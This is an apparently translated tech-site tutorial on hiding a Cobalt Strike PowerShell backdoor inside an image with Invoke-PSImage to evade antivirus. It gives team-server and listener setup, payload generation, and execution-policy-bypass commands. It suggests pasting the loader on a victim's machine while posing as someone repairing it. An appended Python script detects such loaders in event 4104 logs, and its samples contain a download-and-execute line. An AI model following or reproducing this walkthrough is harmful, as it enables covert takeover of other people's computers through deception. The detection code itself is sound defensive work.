2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail how Cobalt Strike uses PowerShell to evade antivirus detection. The editor thinks it is very practical, so it is shared here as a reference. I hope you get something out of reading it.
Experimental preparation
A Kali machine
A test machine (with Huorong antivirus installed)
A 1920x1200 picture (it can be larger but not smaller): the code below is inserted into the picture, and a picture with too few pixels does not have enough room for it.
Cobalt Strike tool
Invoke-PSImage script
Start of the experiment
One: connect to the CS tool from Kali. I use two computers, Kali and Windows 10, because the Cobalt Strike graphical interface is easier to operate on Windows 10; a single Kali machine is also enough.
Download the Cobalt Strike tool, copy it to Kali, and open a terminal in that file location.
Enter the folder and execute the teamserver file. The IP address is the IP of your Kali machine (masked here, in case someone tries to connect to me). 123456 is an arbitrarily chosen password, which the Windows client needs later to connect. A hash string is generated.
Two: also open cobaltstrike3.14 on Windows and double-click cobaltstrike.bat to run it (note that a Java environment needs to be installed).
After it starts, enter the password set on Kali, leave the IP, port and user name as they are by default, and connect to open the graphical interface.
Three: create a listener. Click the headphones icon, add a listener, give it any name, set a port that is not already in use, and leave the other settings at their defaults.
Four: generate the Trojan. Select the Attacks module, choose to generate a backdoor, click Payload Generator, select PowerShell as the output, and save the generated ps1 file to the desktop.
Five: decompress the downloaded Cobalt Strike tool locally, open the Invoke-PSImage-master folder inside it, put the downloaded 1920x1200 picture and the ps1 file into it, open cmd in this folder, and enter the following three commands in turn:
powershell -ExecutionPolicy Bypass
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script .\payload.ps1 -Image .\test1.jpg -Out test2.png -Web
Save the string of code that is generated.
A 22.jpg is generated in the folder; it will be uploaded to the Kali listening machine.
Six: open Cobalt Strike and, for the file, select the generated picture (mine is 22.jpg). The upload generates an address; copy and save it.
Seven: replace the address in the previously saved code string with the address just generated.
Eight: the most important moment. If you are helping someone repair their computer, just open PowerShell from the other party's cmd, paste the string of code just generated, and press Enter to execute it. You can then see the target host come online in Cobalt Strike, having successfully obtained the permissions of the other computer.
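From the defender's side, the one-liner from step five has to load a picture as a bitmap, read its pixel values and execute the recovered text, which leaves a recognisable combination of tokens in PowerShell script block logging (event ID 4104). The following Python is an added example, not part of the original article or of Invoke-PSImage; the event field names, the indicator tokens, the host names and the sample events are constructed assumptions.

```python
import re

# Every group must match before a script block is flagged.
# Assumption: an image-pixel loader has to decode a bitmap, read pixels
# and execute the recovered text. The token list is illustrative, not exhaustive.
REQUIRED = {
    "bitmap": re.compile(r"System\.Drawing\.Bitmap", re.I),
    "pixels": re.compile(r"\.GetPixel\s*\(", re.I),
    "execute": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
}
# A network fetch of the picture raises severity (the -Web variant in step five).
NETWORK = re.compile(r"Net\.WebClient|Invoke-WebRequest|OpenRead\s*\(", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def classify(script_text):
    """Return a finding dict, or None when any required group is absent."""
    if not all(rx.search(script_text) for rx in REQUIRED.values()):
        return None
    remote = bool(NETWORK.search(script_text))
    return {"severity": "high" if remote else "medium",
            "urls": URL.findall(script_text)}

def scan(events):
    """Check only script block logging events (ID 4104) and collect findings."""
    findings = []
    for ev in events:
        if ev.get("event_id") != 4104:
            continue
        hit = classify(ev.get("script_block", ""))
        if hit:
            findings.append({"host": ev.get("host"), **hit})
    return findings

# Constructed sample events (not captured logs); loader bodies are elided with "...".
SAMPLE = [
    {"host": "ws-01", "event_id": 4104, "script_block": "Get-ChildItem C:\\Users | Sort-Object Name"},
    # Ordinary image handling: bitmap and pixels, but nothing is executed.
    {"host": "ws-02", "event_id": 4104, "script_block": r"Add-Type -AssemblyName System.Drawing; $b = New-Object System.Drawing.Bitmap('C:\pics\a.png'); $b.GetPixel(0,0)"},
    {"host": "ws-03", "event_id": 4104, "script_block": r"Add-Type -A System.Drawing; $g = New-Object System.Drawing.Bitmap((New-Object Net.WebClient).OpenRead('http://198.51.100.7/22.jpg')); ... $g.GetPixel($x,$_) ... ; IEX(...)"},
    {"host": "ws-04", "event_id": 4104, "script_block": r"$g = New-Object System.Drawing.Bitmap('C:\Users\Public\22.jpg'); ... $g.GetPixel($x,$_) ... ; Invoke-Expression $s"},
    {"host": "ws-05", "event_id": 4103, "script_block": "System.Drawing.Bitmap .GetPixel( IEX"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The extracted URLs give responders the hosting address to block and to search for in proxy logs; the rule only works where script block logging is enabled on the endpoints.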
This is the end of this article on "how Cobalt Strike uses PowerShell to evade antivirus detection". I hope the above content is of some help to you and lets you learn more. If you think the article is good, please share it so more people can see it.